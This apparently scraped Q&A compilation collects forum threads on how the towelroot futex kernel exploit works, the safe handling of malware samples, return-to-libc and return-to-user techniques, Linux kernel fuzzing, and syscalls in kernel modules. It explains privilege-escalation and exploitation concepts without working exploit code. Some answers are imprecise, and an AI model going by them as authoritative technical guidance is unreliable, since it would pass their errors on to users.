How does towelroot (futex exploit) works

How does towelroot (futex exploit) works - linux

There is a security issue in linux kernel, which affects most of android devices and basically allows any user to become root.
Since I am linux user for quite some time, I am very curious how this exploit works, especially how can I check whether my kernel in my PC (custom built) or on any of my servers, is vulnerable to this or not. Is there any source code (preferably documented) or details of the exploit so that I could see how it works? I could only find the generic information or closed source binaries that do exploit the bug and give you root if executed by any user, but no background information or details of which part of kernel has the flaw and how is it even possible to do this.
So far I found this interesting article http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/ which explains that it uses stack hack, by calling certain syscalls in order to get something into a stack of futex_queue. While I understand how that works, I have no idea how changing anything in that stack can actually elevate privileges of current process. What I found interesting is, that this guy say that since kernel 3.13 something has changed and now different technique is needed to exploit this. Does it mean that this was not even fixed and is still exploitable in recent kernel that can be downloaded from kernel.org?

As SilverlightFox said, the Security portion of stackexchange (http://security.stackexchange.com/) probably would be better for this, but here goes nothing.
From the sound of it, this hack appears to be a way to elevate any users' terminal/kernel for a given amount of time, which is, not to say the least, bad. My idea of how this sort of issue would work is a program that overloads the futex_queue by calling those said syscalls and then provides, temporarily, the user with superuser access.
I looked around at the link you provided and found that it does require remote login from SSH or similar procedures. In a console screenshot, it uses the line gcc -o xpl xpl.c -lpthread, which shows that this exploit is done in C. And a quote directly from the article:
This is actually where the bug is: there is a case where the waiter is
still linked in the waiter list and the function returns. Please note that a kernel stack is completely separate from user stack. You can not
influence kernel stack just by calling your own function in the userspace. You can manipulate kernel stack value by doing syscall.
In the image at http://www.clevcode.org/cve-2014-3153-exploit/, it shows the output of the towelroot exploit, testing the address limits and getting into the task structure to spawn a superuser shell. Also, in the tinyhack article, it gives a simple recreation of this exploit's base, so I'd recommend taking a look at that and working from it.
I don't know any clear form of testing if your system is vulnerable, so the best I can tell you is to try and harden your systems and do all you can to keep it protected. Anyway, I don't think that someone would easily get hold of server ports and logins to run this exploit on your system.
Cheers!

Related

Running a brief asm script inline for dynamic analysis

Is there any good reason not to run a brief unknown (30 line) assembly script inline in a usermode c program for dynamic analysis directly on my laptop?
There's only one system call to time, and at this point I can tell that it's a function that takes a c string and it's length, and performs some sort of encryption on it in a loop, which only iterates through the string as long as the length argument tells it.
I know that the script is (supposed to be) from a piece of malicious code, but for the life of me I can't think of any way it could possibly pwn my computer barring some sort of hardware bug (which seems unlikely given that the loop is ~ 7 instructions long and the strangest instruction in the whole script is a shr).
I know it sounds bad running an unknown piece of assembly code directly on the metal, but given my analysis up to this point I can't think of any way it could bite me or escape.

Yes, you can but I won't recommend it.
The problem is not how dangerous is the code this time (assuming you really understand all of the code and you can predict the outcome of any system call), the problem is that it's a slippery slope and it's not worth it considering what's at stake.
I've done quite a few malware analysis and rarely happened that a piece of code caught me off guard but it happened.
Luckily I was working on a virtual machine within an isolated network: I just restored the last snapshot and stepped through the code more carefully.
If you do this analysis on your real machine you may take the habit and one day this will bite you back.
Working with VMs, albeit not as comfortable as using your OS native GUI, is the way to go.
What could go wrong with running a 7 lines assembly snippet?
I don't know, it really depends on the code but a few things to be careful about:
Exceptions. An instruction may intentionally fault to pass the control to an exception handler. This is why it very important that you totally understand the code: both the instruction and the data.
System calls exploits. A specially crafted input to a system call may trigger a 0-day or an unpatched vulnerability in your system. This is why is important that you can predict the outcome of every system call.
Anti debugger techniques. There are a lot of way a piece of code could escape a debugger (I'm thinking Windows debugging here), it's hard to remember them all, be suspicious of everything.
I've just named a few, it's catastrophically possible that an hardware bug could lead to privileged code execution but if that's really a possibility then nothing but a spare sacrificable machine will do.
Finally, if you are going to run the malware (because I assume the work of extracting the code and its context is too much of a burden) up to a breakpoint on your machine, think of what's at stake.
If you place the break point on the wrong spot, if the malware takes another path or if the debugger has a glitchy GUI, you may loose your data or the confidentiality of your machine.
I'n my opinion is not worth it.
I had to make this premise for generality sake but we all sin something, don't we?
I've never run a piece of malware on my machine but I've stepped through some with a virtual machine directly connected on the company network.
It was a controlled move, nothing happened, the competent personnel was advised and it was an happy ending.
This may very well be your case: it can just be a decryption algorithm and nothing more.
However, only you have the final responsibility to judge if it is acceptable to run the piece of code or not.
As I remarked above, in general it is not a good idea and it presupposes that you really understand the code (something that is hard to do and be honest about).
If you think these prerequisites are all satisfied then go ahead and do it.
Before that I would:
Create an unprivileged user and deny it access to my data and common folders (ideally deny it everything but what's is necessary to make the program work).
Backup the the critical data, if any.
Optionally
Make a restore point.
Take an hash of the system folders, a list of installed services and the value of the usual startup registry keys (Sysinternals have a tool to enum them all).
After the analysis, you can check that nothing important system-wide has changed.
It may be helpful to subst a folder and put the malware there so that a dummy path traversal stops in that folder.
Isn't there better solution?
I like using VMs for their snapshotting capabilities, though you may stumble into an anti-VM check (but they are really dumb checks, so it's easy to skip them).
For a 7-line assembly I'd simply rewrite it as a JS function and run it directly in a browser console.
You can simply transform each register in a variable and transcript the code, you don't need to understand it globally but only locally (i.e. each instruction).
JS is handy if you don't have to work with 64-bit quantities because you have an interpreter in front of you right now :)
Alternatively I use any programming language I have at hand (One time even assembly it self, it seems paradoxical but due to a nasty trick I had to convert a 64-bit piece of code to a 32-bit one and patch the malware with it).

You can use Unicorn to easily emulate a CPU (if the architecture is supported) and play with your shellcode without any risk.

Why is return-to-libc much earlier than return-to-user?

I'm really new to this topic and only know some basic concepts. Nevertheless, there is a question that quite confuses me.
Solar Designer proposed the idea of return-to-libc in 1997 (http://seclists.org/bugtraq/1997/Aug/63). Return-to-user, from my understanding, didn't become popular until 2007 (http://seclists.org/dailydave/2007/q1/224).
However, return-to-user seems much easier than return-to-libc. So my question is, why did hackers spend so much effort in building a gadget chain by using libc, rather than simply using their own code in the user space when exploiting a kernel vulnerability?
I don't believe that they did not realize there are NULL pointer dereference vulnerabilities in the kernel.

Great question and thank you for taking some time to research the topic before making a post that causes it's readers to lose hope in the future of mankind (you might be able to tell I've read a few [exploit] tags tonight)
Anyway, there are two reasons
return-to-libc is generic, provided you have the offsets. There is no need to programmatically or manually build either a return chain or scrape existing user functionality.
Partially because of linker-enabled relocations and partly because of history, the executable runtime of most programs executing on a Linux system essentially demand the libc runtime, or at least a runtime that can correctly handle _start and cons. This formula still stands on Windows, just under the slightly different paradigm of return-to-kernel32/oleaut/etc but can actually be more immediately powerful, particularly for shellcode with length requirements, for reasons relating to the way in which system calls are invoked indirectly by kernel32-SSDT functions
As a side-note, If you are discussing NULL pointer dereferences in the kernel, you may be confusing return to vDSO space, which is actually subject to a different set of constraints that standard "mprotect and roll" userland does not.

Ret2libc or ROP is a technique you deploy when you cannot return to your shellcode (jmp esp/whatever) because of memory protections (DEP/NX).

They perform different goals, and you may engage with both.
Return to libc
This is a buffer overrun exploit where you have control over some input, and you know there exists a badly written program which will copy your input onto the stack and return through it. This allows you to start executing code on a machine you have not got a login to, or a very restrictive access.
Return to libc gives you the ability to control what code is executed, and would generally result in you running within the space, a more natural piece of code.
return from kernel
This is a privilege escalation attack. It takes code which is running on the machine, and exploits bugs in the kernel causing the kernel privileges to be applied to the user process.
Thus you may use return-to-libc to get your code running in a web-browser, and then return-to-user to perform restricted tasks.
Earlier shellcode
Before return-to-libc, there was straight shellcode, where the buffer overrun included the exploit code, with knowledge about where the stack would be, this was possible to run directly. This became somewhat obsolete with the NX bit in windows. (x86 hardware was capable of having execute on a segment, but not a page).
Why is return-to-libc much earlier than return-to-user?
The goal in these attacks is to own the machine, frequently, it was easy to find a vulnerability in a user-mode process which gave you access to what you needed, it is only with the hardening of the system by reducing the privilege at the boundary, and fixing the bugs in important programs, that the new return-from-kernel became necessary.

Fuzzing the Linux Kernel: A student in peril.

I am currently a student at a university studying a computing related degree and my current project is focusing on finding vulnerabilities in the Linux kernel. My aim is to both statically audit as well as 'fuzz' the kernel (targeting version 3.0) in an attempt to find a vulnerability.
My first question is 'simple' is fuzzing the Linux kernel possible? I have heard of people fuzzing plenty of protocols etc. but never much about kernel modules. I also understand that on a Linux system everything can be seen as a file and as such surely input to the kernel modules should be possible via that interface shouldn't it?
My second question is: which fuzzer would you suggest? As previously stated lots of fuzzers exist that fuzz protocols however I don't see many of these being useful when attacking a kernel module. Obviously there are frameworks such as the Peach fuzzer which allows you to 'create' your own fuzzer from the ground up and are supposedly excellent however I have tried repeatedly to install Peach to no avail and I'm finding it difficult to believe it is suitable given the difficulty I've already experienced just installing it (if anyone knows of any decent installation tutorials please let me know :P).
I would appreciate any information you are able to provide me with this problem. Given the breadth of the topic I have chosen, any idea of a direction is always greatly appreciated. Equally, I would like to ask people to refrain from telling me to start elsewhere. I do understand the size of the task at hand however I will still attempt it regardless (I'm a blue-sky thinker :P A.K.A stubborn as an Ox)
Cheers
A.Smith

I think a good starting point would be to extend Dave Jones's Linux kernel fuzzer, Trinity: http://codemonkey.org.uk/2010/12/15/system-call-fuzzing-continued/ and http://codemonkey.org.uk/2010/11/09/system-call-abuse/
Dave seems to find more bugs whenever he extends that a bit more. The basic idea is to look at the system calls you are fuzzing, and rather than passing in totally random junk, make your fuzzer choose random junk that will at least pass the basic sanity checks in the actual system call code. In other words, you use the kernel source to let your fuzzer get further into the system calls than totally random input would usually go.

"Fuzzing" the kernel is quite a broad way to describe your goals.
From a kernel point of view you can
try to fuzz the system calls
the character- and block-devices in /dev
Not sure what you want to achieve.
Fuzzing the system calls would mean checking out every Linux system call (http://linux.die.net/man/2/syscalls) and try if you can disturb regular work by odd parameter values.
Fuzzing character- or block-drivers would mean trying to send data via the /dev-interfaces in a way which would end up in odd result.
Also you have to differentiate between attempts by an unprivileged user and by root.
My suggestion is narrowing down your attempts to a subset of your proposition. It's just too damn broad.
Good luck -
Alex.

One way to fuzzing is via system call fuzzing.
Essentially the idea is to take the system call, fuzz the input over the entire range of possible values - whether it remain within the specification defined for the system call does not matter.

How to convince my co-worker the linux kernel code is re-entrant?

Yeah I know ... Some people are sometimes hard to convince of what sounds natural to the rest of us, an I need your help right now SO community (or I'll go postal soon ..)
One of my co-worker is convinced the linux kernel code is not re-entrant as he reads it somewhere last time he get insterested in it, likely 7 years ago. Probably its reading was right at that time, remember that multi core architecture was not much widespread some time ago and linux project at its begining or so was not totally well writen and fully fledged with all fancy features.
Today is different. It's obvious that calling the same system call from different processes running in parallel on the same architecture won't lead to undefined behavior. Linux kernel is widespread now, and known for its reability even though running on multicore architectures.
That is my argument for now. But what would be yours to prove that objectively ?
I was thinking to show him off some function in the linux kernel (on lxr website ) as the mutex_lock() system call. Eveything is tuned to get it work in concurrent environnement. But the code could be not that obvious for newbie (as I am).
Please help me.. ;-)

Search the kernel mailing list archive for "BKL". That stands for "Big Kernel Lock", which is what used to be used to prevent problems. A lot of work has been put into breaking it up into pieces, to allow reentry as long different parts of the kernel are used by different processes. Most recent mentions of "BKL" (at least that I've noticed) have basically referred to somebody trying to make his own life easy by locking more than somebody else approved of, at which point they frequently say something about "returning to the days of the BKL", or something on that order.

The easiest way to prove that multiple CPUs can execute in the kernel simultaneously would be to write a program that does a lot of work in-kernel (for example, looks up long pathnames in a tight loop), then run two copies of it at the same time on a dual-core machine and show that the "system" percentage in top goes above 50%.

At the risk of being snarky: why not just read the code? If neither of you are expert enough to follow the code through an interrupt handler and into some subsystem or another where you can read out the synchronization code, then ... why bother? Isn't this just a dancing on the head of a pin argument? It's like a creationist demanding "proof" of evolution when they aren't interested in learning any biology.

Maybe you should have your friend prove Linux is not reentrant. Burden should not be on you to prove this.

Is it possible to add a system call via a LKM?

I'd like to add a new system call via an LKM, but I'm not sure how to do this. That is, I know that if I want to add a completely new system call, I can look through the sys_call_table and find a sys_ni_syscall and just replace it, but I was curious if it was possible to actually add to the sys_call_table. I realize it's probably not possible, given that it's a fixed size array, but I was wondering if there were any other clever ways to add system calls without overriding an unused system call number.

Here's an example
linux system calls
edit:
The example above shows howto implement a system call, as far as implementing one from a loadable module; AFAIK, that's not possible, unless you where to overwrite an existing one because the size of the array is a #define.
Keep in mind there are user space changes required as well, at least if you want to be able to actually use the new system call.

Check The Linux Documentation Project website for "The Linux Kernel Module Programming Guide" (http://www.tldp.org/LDP/lkmpg/2.6/html/index.html). Specifically, look here for System Calls: http://www.tldp.org/LDP/lkmpg/2.6/html/x978.html. That should give you a start, at least.

This is an old question, but nevertheless I want to propose my solution. The easiest way to implement a "system-call-like" environment is to rely on a fake device.
In particular, you could create a new device driver which is not actually driving anything. Yet, writing on it, can cause the installed module to perform the required actions.
Additionally, if you want to offer several services, you might map them to ioctl operations.

Develop Reference

node.js excel linux python-3.x azure haskell apache-spark rust .htaccess string